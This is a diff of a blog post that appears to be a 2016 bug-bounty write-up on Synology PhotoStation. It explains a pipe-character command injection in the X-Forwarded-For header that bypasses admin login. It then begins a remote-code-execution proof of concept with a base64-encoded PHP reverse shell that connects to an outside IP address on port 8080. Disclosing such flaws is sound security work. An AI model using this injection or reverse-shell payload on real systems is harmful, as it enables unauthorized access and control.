bamboofox/old-blog/source/_posts/Synology-Bug-Bounty-2016.md

 Connection: close
 ```

-The key points of POC1 are '|' in X-Forwarded-For field and SynoToken.
-We found that server site CGI will concate user, X-Forwarded-For and SynoToken into command and execute this command.
-But the special characters '|' and '>' is not correctly filter out.
+The key points are the `|` character in the `X-Forwarded-For` field and `/bin/true` in the get parameter `SynoToken`.
+The server site CGI will concatenate the strings in `usr`, `X-Forwarded-For` and `SynoToken` into a command and execute the command, and the special characters `|` and `>` aren't filtered out correctly, which will lead to the **command injection** vulnerability.

-Therefore in our POC1, the command will become
+Therefore in our PoC1, the command will become:
 ```
 /usr/syno/bin/synophoto_dsm_user username | /bin/true
 ```

-This command returns 0(True) and bypasses the authentication.
+The command will return 0 (True) and thus bypass the authentication.

-**Expected Result:
+**Result:
 Adversary can login as admin without password**

 ![Login without password](http://i.imgur.com/pnIWZ6t.png)

-Vul-02: PhotoStation Remote Code Execution
+## Vul-02: PhotoStation Remote Code Execution
 ---
-After first attemp to login success,
-we futher extend out attack for remote code execution.
+After we successfully login as admin via the command injection vulnerability, we extended the attack surface to attempt remote code execution.

-POC2:
+PoC2:
 1 .
-Encode the command you want in base64
+Encode the command into base64 format
 ```
-$sock=fsockopen("......",8080);exec("/bin/sh -i <&3 >&3 2>&3");
+base64encode( $sock=fsockopen("......",8080);exec("/bin/sh -i <&3 >&3 2>&3"); )
 => JHNvY2s9ZnNvY2tvcGVuKCIzNi4yMzEuNjguMjE1Iiw4MDgwKTtleGVjKCIvYmluL3NoIC1pIDwmMyA+JjMgMj4mMyIpOw==
 ```